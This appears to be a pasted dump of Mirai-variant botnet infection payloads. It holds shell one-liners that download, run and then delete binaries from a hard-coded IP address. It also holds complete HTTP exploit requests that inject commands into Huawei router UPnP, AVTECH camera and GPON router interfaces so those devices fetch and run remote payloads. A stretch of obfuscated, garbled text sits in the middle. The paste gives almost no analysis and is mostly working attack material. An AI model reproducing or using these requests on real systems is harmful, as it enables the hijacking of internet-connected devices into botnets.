Mirai Botnet

a guest
Oct 31st, 2018
BREAKDOWN OF THE MIRAI BotNet:
-- Oct 31st, 2018

Is it ofsec fail ?--> d4rka

cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm7 -O d4rka; chmod 777 d4rka; ./d4rka avtech; rm -rf d4rka
cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb avtech; rm -rf d4rkb

cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm7 -O d4rka; chmod 777 d4rka; ./d4rka gpon_armv7l; rm -rf d4rka
cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb gpon_armv4l; rm -rf d4rkb

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0"?>
<s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(/bin/busybox wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei; /bin/busybox chmod 777 * /tmp/ankitxd; /tmp/ankitxd huawei)</NewStatusURL>
<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>

hxxp://209.141.33.119/avtechsh
hxxp://209.141.33.119/gponsh

huagoagpoGET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
User-Agent: Dark
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


GET / HTTP/1.1POST /GponForm/diag_Form?images/ HTTP/1.1
User-Agent: Dark
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://209.141.33.119/gponsh+-O+/tmp/d4rk;sh+/tmp/d4rk`&ipv=0gjg*`evomkp*jap tvk|}tmta*gki+tvkg++a|a+b`+wpepqw+tvkg+jap+pgtwlahhajefhaw}wpaiwlfelwpevphmjq|wlahh+fmj+fqw}fk|$@EVO@EVO>$etthap$jkp$bkqj`jgkvvagpkcmjewwskv`ajpav+`ar+sepgl`kc+`ar+imwg+sepgl`kc+wfmj+sepgl`kc+fmj+sepgl`kc+`ar+BPS@P545[sepgl`kc+`ar+BPS@P545+sepgl`kc+`ar+sepgl`kc4+apg+`abeqhp+sepgl`kc+apg+sepgl`kc@EVO`kcapg?/dev/null

########
#SHELL:#
########
wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei;
/bin/busybox chmod 777 * /tmp/ankitxd;
/tmp/ankitxd huawei)
</NewStatusURL>
<NewDownloadURL>
$(echo HUAWEIUPNP)
</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>

########
#:HTTP:#
########
GET / HTTP/1.1
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
User-Agent: Dark